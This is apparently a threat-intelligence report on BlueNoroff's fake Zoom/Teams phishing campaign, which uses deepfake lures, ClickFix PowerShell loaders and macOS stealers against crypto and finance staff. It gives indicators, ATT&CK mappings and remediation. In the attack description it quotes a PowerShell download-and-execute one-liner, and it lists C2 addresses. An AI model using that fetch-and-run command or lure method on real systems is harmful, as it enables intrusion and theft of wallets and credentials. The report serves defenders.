Threat reportMalwareTL-2026-1678
BlueNoroff "ClickFake Interview" Zoom/Teams Phishing Kit: AI Deepfake Video Lures, ClickFix PowerShell Loaders, and Crypto Wallet/iCloud Keychain Theft
BlueNoroff "ClickFake Interview" Zoom/Teams Phishing Kit (TL-2026-1678), also tracked as ClickFake Interview, is a high-severity malware campaign, first published 2026-07-24. It is attributed to APT38 (North Korea) with high confidence, affects Microsoft Windows (all supported desktop versions), maps to 33 MITRE ATT&CK techniques (T1005, T1007, T1027), and is covered by 9 detection rules and 35 indicators of compromise.
- Severity
- HIGHAssessed severity
- CVEs
- 0None referenced
- Techniques
- 33MITRE ATT&CK
- Actors
- 1APT38
- Detection rules
- 9SPL · KQL · Sigma
- IOCs
- 35Indicators of compromise
Key facts for TL-2026-1678
- Threat ID
- TL-2026-1678
- Also known as
- ClickFake Interview, Fake Zoom/Teams Deepfake Campaign
- Severity
- HIGH
- Status
- ACTIVE
- Category
- MALWARE
- First published
- Last reviewed
- Attribution
- APT38
- Attribution confidence
- HIGH
- Nation-state nexus
- North Korea
- Motivation
- FINANCIAL
- Target sectors
- cryptocurrency, blockchain, venture-capital, finance, investment, web3, technology
- Target regions
- North America, Europe, East Asia, Southeast Asia, united kingdom, Middle East
- Detection rules
- 9
- Indicators of compromise
- 35
Malware and tooling in BlueNoroff "ClickFake Interview" Zoom/Teams Phishing Kit
Malware and tooling: CryptoBot, Root Troy V4, XScreen, Telegram Bot API
How BlueNoroff "ClickFake Interview" Zoom/Teams Phishing Kit works
North Korean-aligned BlueNoroff (Lazarus Group financial sub-cluster) is running active ClickFix-style phishing campaigns using typosquatted Zoom/Teams meeting domains and AI-generated deepfake video to lure cryptocurrency and venture-capital professionals into running PowerShell/VBScript loaders (Windows) or shell-script stealers (macOS). Five distinct phishing-kit versions were identified between 31 May and 14 July 2026, disabling Defender, enumerating 25+ crypto wallet browser extensions, extracting Chrome master keys and iCloud Keychain data, and exfiltrating via Telegram bot API and dedicated C2 servers.
BlueNoroff, the financially motivated cybercrime sub-cluster of North Korea's Lazarus Group, is operating an active phishing-kit campaign publicly tracked (in overlapping reporting from Sekoia, Arctic Wolf, and Huntress) as "ClickFake Interview"/fake-meeting operations. The operation begins with social engineering over Telegram or LinkedIn/X using a hijacked or fabricated contact, a manipulated Calendly invite, and a typosquatted Zoom or Microsoft Teams domain (over 80 such domains identified, registered in bulk with a single hosting provider). Victims are drawn into a self-contained JavaScript fake meeting room that captures webcam video via getUserMedia and streams it to attacker infrastructure, seeding a self-reinforcing AI deepfake production pipeline (ChatGPT/GPT-4o generated portraits composited with real captured body movement using Adobe Premiere Pro, FFmpeg, and Microsoft Clipchamp) used to spoof legitimacy in subsequent calls.
Approximately eight seconds into the fake call, a ClickFix-style overlay prompts the victim to "fix" a fabricated audio/SDK error by copying and pasting a command; the attacker intercepts the clipboard and injects a PowerShell download-cradle (`powershell -ep bypass -c "(iwr ... -UseBasicParsing).Content | iex"`). This downloads a Base64/XOR (key 0x43) obfuscated second-stage PowerShell downloader that lands a further payload in `%TEMP%\chromechip.log`, disables/exclusions Microsoft Defender, and displays a fake "Zoom was updated successfully" dialog to dispel suspicion. A final in-memory PowerShell implant beacons every five seconds to a dedicated C2 (observed: `83.136.208.246:6783/api/daemon`), exfiltrating host reconnaissance data (hostname, username, OS build, timezone, running processes, admin/proxy status).
Post-exploitation modules include: Telegram Desktop session theft (`tdata`/`key_datas`) enabling account-hijack-driven onward campaigns; a Donut-loaded, MSVC-compiled native PE64 browser-credential stealer that recovers Chrome/Edge/Brave app-bound encryption keys via COM elevation (`IElevator`) and AES-256-GCM/BCrypt decryption, writing credentials to `pchr.csv`/`pmse.csv`/`pbra.csv`; screenshot capture via both direct HTTP POST and Telegram Bot API; UAC-bypass privilege escalation via the `Elevation:Administrator!new` COM moniker; and Startup-folder LNK persistence disguised as a Chrome updater (observed to persist up to 66 days).
On macOS, a fake Teams/Zoom `.pkg`/AppleScript installer (`zoom_sdk_support.scpt`) drops a modular toolset written in Go, Nim, Objective-C, Swift, and C/C++: a Go backdoor ("Root Troy V4"/`remoted`), a Go infostealer ("CryptoBot"/`airmond`), an Objective-C keylogger ("XScreen"/`keyboardd`) using Core Graphics EventTap, and a Nim-based persistent implant masquerading as "Telegram 2", installed as a LaunchDaemon (`/Library/LaunchDaemons/com.telegram2.update.agent.plist`) running hourly. The macOS toolset enumerates and exfiltrates data for 25+ cryptocurrency wallet browser extensions (MetaMask, Phantom, Rabby, OKX, Trust, TON, Sui, and others), extracts Chrome master keys sourced from iCloud Keychain, and captures keystrokes, screenshots, clipboard content, and audio, exfiltrating over HTTPS and WebSocket C2 channels and a dedicated Telegram channel ("Aurora").
Victimology skews heavily toward cryptocurrency/Web3 and adjacent finance/investment roles: of 100 identified targets in the Arctic Wolf dataset, 80% work in Web3/crypto, 76% hold C-level or founder titles, and targeting is concentrated during DPRK business hours (08:00-18:00 KST, Monday-Friday). The campaign is under continuous, rapid development — five distinct phishing-kit versions were fielded between 31 May and 14 July 2026 — consistent with a well-resourced, state-directed operation rather than opportunistic cybercrime.
MITRE ATT&CK techniques used in TL-2026-1678
Collection
T1005 Data from Local System; T1056 Input Capture; T1113 Screen Capture; T1115 Clipboard Data; T1123 Audio Capture
Discovery
T1007 System Service Discovery; T1033 System Owner/User Discovery; T1049 System Network Connections Discovery; T1082 System Information Discovery; T1083 File and Directory Discovery; T1087 Account Discovery; T1120 Peripheral Device Discovery; T1482 Domain Trust Discovery; T1518 Software Discovery
Defense Evasion
T1027 Obfuscated Files or Information; T1036 Masquerading; T1140 Deobfuscate/Decode Files or Information
Persistence
T1037 Boot or Logon Initialization Scripts; T1547 Boot or Logon Autostart Execution
Exfiltration
T1041 Exfiltration Over C2 Channel
Execution
T1059 Command and Scripting Interpreter; T1106 Native API; T1204 User Execution
collection
Privilege Escalation
T1134 Access Token Manipulation; T1548 Abuse Elevation Control Mechanism
Credential Access
T1552 Unsecured Credentials; T1555 Credentials from Password Stores; T1557 Adversary-in-the-Middle
defense-impairment
T1553 Subvert Trust Controls; T1685 Disable or Modify Tools
Initial Access
Reconnaissance
Affected products and versions in BlueNoroff "ClickFake Interview" Zoom/Teams Phishing Kit
- Microsoft — Windows (all supported desktop versions)
Vulnerable versions: Windows 10; Windows 11 - Apple — macOS
Vulnerable versions: macOS 13; macOS 14; macOS 15 - Google — Chrome / Chromium-based browsers (Chrome, Edge, Brave, Opera, Vivaldi, Chromium)
Vulnerable versions: all versions storing app-bound encrypted credentials - Various — Cryptocurrency wallet browser extensions (MetaMask, Phantom, Rabby, OKX, Trust, Binance, Bitget, Coin, Keplr, Leather, Nabox, Rainbow, Ronin, SafePal, Sender, Station, SubWallet, Sui, TON, Tron, Unisat, Xverse)
Vulnerable versions: all
Remediation for BlueNoroff "ClickFake Interview" Zoom/Teams Phishing Kit
Immediate actions
- Block identified typosquatted Zoom/Teams domains and observed C2 IPs (83.136.208.246, 83.136.209.22, 104.145.210.107) at DNS/perimeter firewall
- Alert on and block execution of clipboard-pasted PowerShell one-liners invoked via 'iwr ... | iex' patterns
- Enforce policy that meeting-software 'SDK updates' or troubleshooting steps are never requested via clipboard-paste-and-run prompts
- Audit and restrict Microsoft Defender exclusion changes made outside of approved software deployment tooling
- Hunt for Startup-folder LNK files disguised as browser updaters and for LaunchDaemon plists referencing 'telegram2' or similar masquerading names
Workarounds
- Disable clipboard auto-paste/run affordances in terminal and PowerShell ISE where feasible
- Restrict macOS AppleScript (.scpt) execution from Gatekeeper-quarantined downloads via configuration profile
Longer-term hardening
- Deploy EDR with behavioral detection for in-memory/fileless PowerShell C2 beaconing and Donut-loaded shellcode execution
- Mandate hardware wallets / air-gapped signing for high-value crypto/Web3 personnel rather than browser-extension hot wallets
- Implement organization-wide policy requiring out-of-band verification of external meeting invites for finance/executive staff
- Deploy application allow-listing to block unsigned/newly-compiled PE64 and Mach-O binaries in user-writable directories
- Monitor for anomalous Telegram Desktop tdata access and bot-API-based outbound traffic as an exfiltration channel
Weaknesses (CWE) in BlueNoroff "ClickFake Interview" Zoom/Teams Phishing Kit
Timeline of BlueNoroff "ClickFake Interview" Zoom/Teams Phishing Kit
- Sekoia TDR investigation first documents the 'ClickFake Interview' campaign attributed to Lazarus/BlueNoroff targeting crypto job seekers with fake interview sites deploying the GolangGhost backdoor.
- First public reporting of BlueNoroff deploying deepfake video during fake Zoom calls to distribute a macOS backdoor against a crypto employee.
- Arctic Wolf Labs-tracked intrusion begins via a manipulated Calendly invite and typosquatted Zoom link (uu01webzoom[.]us), later attributed with high confidence to BlueNoroff.
- Additional typosquatted Teams/Zoom domains (teams.livesmeet[.]us, zoom.ue01web[.]us) registered as part of the ongoing infrastructure buildout (80+ domains total under one hosting provider).
- Telegram Bot API exfiltration channel added to the screenshot-capture module as a second, in-memory exfiltration method.
- Campaign activity reaches an observed peak of 121 recorded intrusion-related events in March 2026, consistent with DPRK business-hour operational tempo.
- First of five distinct BlueNoroff phishing-kit versions identified in the current wave of active development.
- Arctic Wolf publishes technical analysis 'BlueNoroff Uses ClickFix, Fileless PowerShell, and AI-Generated Fake Zoom Meetings to Target Web3 Sector,' detailing the C2 infrastructure, deepfake production pipeline, and 100-victim targeting dataset.
- Fifth and most recent identified phishing-kit version fielded, marking the close of the observed May-July development window.
- The Hacker News reports on the active BlueNoroff Zoom/Teams phishing kit campaign profiling crypto wallets, consolidating prior vendor reporting into a single public advisory.
Sources cited for BlueNoroff "ClickFake Interview" Zoom/Teams Phishing Kit
- BlueNoroff Zoom Phishing Kit Profiles Crypto Wallets
- BlueNoroff Uses ClickFix, Fileless PowerShell, and AI-Generated Fake Zoom Meetings to Target Web3 Sector
- Inside the BlueNoroff Web3 macOS Intrusion Analysis
- Lazarus ClickFake Interview Campaign: ClickFix Malware
- From Contagious to ClickFake Interview (TLP:CLEAR Investigation Report)
- BlueNoroff Deepfake Zoom Scam Hits Crypto Employee with macOS Backdoor Malware
- BlueNoroff Uses Fake Zoom Calls to Turn Victims Into Attack Lures
- North Korean Hackers Target Crypto Firms with ClickFix and Zoom Lures
- North Korea's BlueNoroff uses deepfakes in Zoom calls to hack crypto workers
- BlueNoroff hackers steal crypto using fake MetaMask extension
- BlueNoroff Group: The Financial Cybercrime Arm of Lazarus
- DPRK's Famous Chollima Deploys RATs Through ClickFake Job Interviews
Detection coverage for TL-2026-1678
As of 2026-07-24, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-1678 across Splunk SPL, Microsoft KQL and Sigma, covering 35 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.
Community OSINT corroboration for TL-2026-1678
3 of this threat's indicators have also been reported by the open-source security community, which observed at least one of them before this report was published. Community sightings are unverified and are kept separate from Threadlinqs' curated indicators. Indicator values, reporters and campaign linkage are available to authenticated Red-tier users.